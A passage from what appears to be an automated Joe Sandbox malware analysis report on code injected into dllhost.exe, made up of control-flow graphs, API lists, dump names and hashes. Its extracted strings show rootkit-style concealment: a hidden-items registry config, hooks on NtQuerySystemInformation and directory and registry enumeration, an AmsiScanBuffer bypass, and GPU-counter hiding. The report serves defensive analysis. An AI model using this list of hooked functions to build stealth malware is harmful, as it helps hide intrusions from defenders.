        control_flow_graph 315 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 316 1400036be-1400036d1 K32EnumProcesses 315->316 317 1400036d3-1400036e2 316->317 318 14000371b-140003724 SleepEx 316->318 319 1400036e4-1400036e8 317->319 320 14000370c-140003717 317->320 318->316 321 1400036ea 319->321 322 1400036fb-1400036fe call 1400031c4 319->322 320->318 323 1400036ee-1400036f3 321->323 326 140003702 322->326 324 1400036f5-1400036f9 323->324 325 140003706-14000370a 323->325 324->322 324->323 325->319 325->320 326->325
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess$EnumProcessesSleep
        • String ID:
        • API String ID: 3676546796-0
        • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
        • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
        • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
        • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
        • String ID:
        • API String ID: 1323846700-0
        • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
        • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
        • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
        • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 357 17c6dd7f598-17c6dd7f5b3 358 17c6dd7f5b6-17c6dd7f5df 357->358 359 17c6dd7f5eb-17c6dd7f5f4 358->359 360 17c6dd7f5e1-17c6dd7f5e6 358->360 362 17c6dd7f5f6-17c6dd7f5f9 359->362 363 17c6dd7f60c 359->363 361 17c6dd7f676-17c6dd7f67f 360->361 361->358 365 17c6dd7f685-17c6dd7f69f 361->365 366 17c6dd7f605-17c6dd7f60a 362->366 367 17c6dd7f5fb-17c6dd7f603 362->367 364 17c6dd7f611-17c6dd7f622 GetStdHandle 363->364 368 17c6dd7f624-17c6dd7f62f GetFileType 364->368 369 17c6dd7f651-17c6dd7f669 364->369 366->364 367->364 368->369 370 17c6dd7f631-17c6dd7f63c 368->370 369->361 371 17c6dd7f66b-17c6dd7f66f 369->371 372 17c6dd7f645-17c6dd7f648 370->372 373 17c6dd7f63e-17c6dd7f643 370->373 371->361 372->361 374 17c6dd7f64a-17c6dd7f64f 372->374 373->361 374->361
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction ID: 6141628bdf6e6aab5108ff819d0260e3d6a4a008ae601445022bf64e978f936c
        • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction Fuzzy Hash: 89314F32618B4491EF70AB2595C02AD6A60F345BB0F69134DEBAE573F0CB35D4E1D3A0

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 339 17c6dabf598-17c6dabf5b3 340 17c6dabf5b6-17c6dabf5df 339->340 341 17c6dabf5eb-17c6dabf5f4 340->341 342 17c6dabf5e1-17c6dabf5e6 340->342 344 17c6dabf5f6-17c6dabf5f9 341->344 345 17c6dabf60c 341->345 343 17c6dabf676-17c6dabf67f 342->343 343->340 346 17c6dabf685-17c6dabf69f 343->346 347 17c6dabf5fb-17c6dabf603 344->347 348 17c6dabf605-17c6dabf60a 344->348 349 17c6dabf611-17c6dabf622 GetStdHandle 345->349 347->349 348->349 350 17c6dabf624-17c6dabf62f GetFileType 349->350 351 17c6dabf651-17c6dabf669 349->351 350->351 353 17c6dabf631-17c6dabf63c 350->353 351->343 352 17c6dabf66b-17c6dabf66f 351->352 352->343 354 17c6dabf645-17c6dabf648 353->354 355 17c6dabf63e-17c6dabf643 353->355 354->343 356 17c6dabf64a-17c6dabf64f 354->356 355->343 356->343
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.2989903575.0000017C6DAB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DAB0000, based on PE: true
        • Associated: 00000025.00000002.2988620981.0000017C6DAB0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2991621779.0000017C6DAC5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2992926886.0000017C6DAD0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2994289215.0000017C6DAD2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2995505303.0000017C6DAD9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dab0000_dllhost.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction ID: a3ad8f93b9f208413b01876a198c8e85ff18750fbf0b7c33acbdbdc8302fa70f
        • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction Fuzzy Hash: 24318F3661CB8495EF608B2495E02A92661F345BB0F68130DEF6E073F2CB36D4E2D380
        APIs
        Memory Dump Source
        • Source File: 00000025.00000003.2618691354.0000017C6DA80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017C6DA80000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_3_17c6da80000_dllhost.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction ID: e260be4d35421084bcb3cdf8b952b5aac700febf79770c3e91d4be6cc4715d85
        • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction Fuzzy Hash: 5991F472B0919087DF648F25D4807ADB3A1FB55F95F548128AE8D877CADA34D8D3C740

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 375 140002d38-140002d3c call 140002d4c 377 140002d41-140002d43 ExitProcess 375->377
        APIs
          • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
          • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
          • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
          • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
          • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
          • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
          • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
          • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
          • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
          • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
          • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
          • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
          • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
          • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
          • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
          • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
        • ExitProcess.KERNEL32 ref: 0000000140002D43
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
        • String ID:
        • API String ID: 3805535264-0
        • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
        • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
        • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
        • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
        • API String ID: 2119608203-3850299575
        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: d6c81914a687e9810629ea9cb3824d4885e1bf87798c2346bd6c6c8bc810511e
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: EDB168322186A086EF65AF66D8807E9A3B5F745B84F54505AFF2D53BA4DE35CCC0C3A0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
        • String ID: \t9"1
        • API String ID: 1239891234-2818780629
        • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction ID: 666eb60b3e50730722908edb228c588d86988610cb9934d5a8f7b5ca73210e75
        • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction Fuzzy Hash: C2413B36218B8086EB60DF25E8807EE73B4F788798F50011AEB9D46B98DF78C5D5CB50
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
        • String ID:
        • API String ID: 3140674995-0
        • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction ID: 88e2dad57461687df2457b63b2f7ee3e05eec3179c6ef57ae21b8df1d51bcd42
        • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction Fuzzy Hash: A6311972209B8086EB61AF60E8807EE7375F788748F44442AEB4E47B94DF78C5C88760
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Find$CloseFile$FirstNext
        • String ID: \t9"1
        • API String ID: 1164774033-2818780629
        • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction ID: 020828e7fca0e5349b8ab346584f93e7df2ba306c29cc8d1b83f1c8d767b2d68
        • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction Fuzzy Hash: B0A1B43270868089FF21AB75A8C03ED6BB1A7C5794F144159BF9D27B99DA34C4C2C760
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
        • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
        • API String ID: 2135414181-3414887735
        • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction ID: 9b2cda23558094bc4f0273148d6e04e58685f777ffb6458f7fac070a39fa1823
        • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction Fuzzy Hash: 8F71EB36314A5185EF21AF65E8E16D923B4FB84B88F402219EF4E57B68DF34C4C5C790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
        • API String ID: 1735320900-4225371247
        • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction ID: 5da42ed1ffadee920fdd3a6827ec99a349429ce9cd9eb830fba9837c9ac4c10f
        • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction Fuzzy Hash: 1C518D70518A8AA5EF12FBA9ECC1BD46734A740349F80465BBA0D16765DE7882DAC3F0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
        • String ID: d
        • API String ID: 2005889112-2564639436
        • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction ID: ac481bef8fca157afcd9683bfa9fc4cce864fdf38b681d652077e029aade8234
        • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction Fuzzy Hash: 59512B32218B8496EB25DF62E4983AA77B1F788F99F444128EF4E07758DF38C0C58790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
        • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
        • API String ID: 740688525-1880043860
        • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction ID: a2fb5a2f819eb04b270e5b4f20cb4fabde424200cb354287f0f263076fb08f7e
        • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction Fuzzy Hash: 53519E3170974451EE25BB66A8807E922B0BB48BB0F580729EF3E477D4DF38D4C587A0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: \t9"1$csm$csm$csm
        • API String ID: 849930591-931476357
        • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction ID: 2306e68bd77d8186e02cf75f79763a6101b014cd4d26bff6e651f299c393dac3
        • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction Fuzzy Hash: 79D15732608B808AEF20AF6594817DD77B0F745B88F102259EF8D57B9ADB38C5D1C790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Running Time
        • API String ID: 1943346504-1805530042
        • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction ID: 6cce2b05171c319ec8ae83cc88c5a5ccd002c450ef7ec9af368a71565ff95dfe
        • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction Fuzzy Hash: 42317132608B5096EB26EF12A8847E9A3B4F788B99F444569EF4D43724DF38C4D68790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Utilization Percentage
        • API String ID: 1943346504-3507739905
        • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction ID: f28cc51ae09a7c11f906cb145423b80c79d04469284912f3f43046cda0fb0fa4
        • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction Fuzzy Hash: 70315932618B418AEF51EF22A8C47A9B3B0F784F95F444169AF5E43764EF38D4C68790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Thread$Current$Context
        • String ID: \t9"1
        • API String ID: 1666949209-2818780629
        • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction ID: d0314f847073577d509be4c80f26056aadbc75c6426e23c10ec85da3be25be00
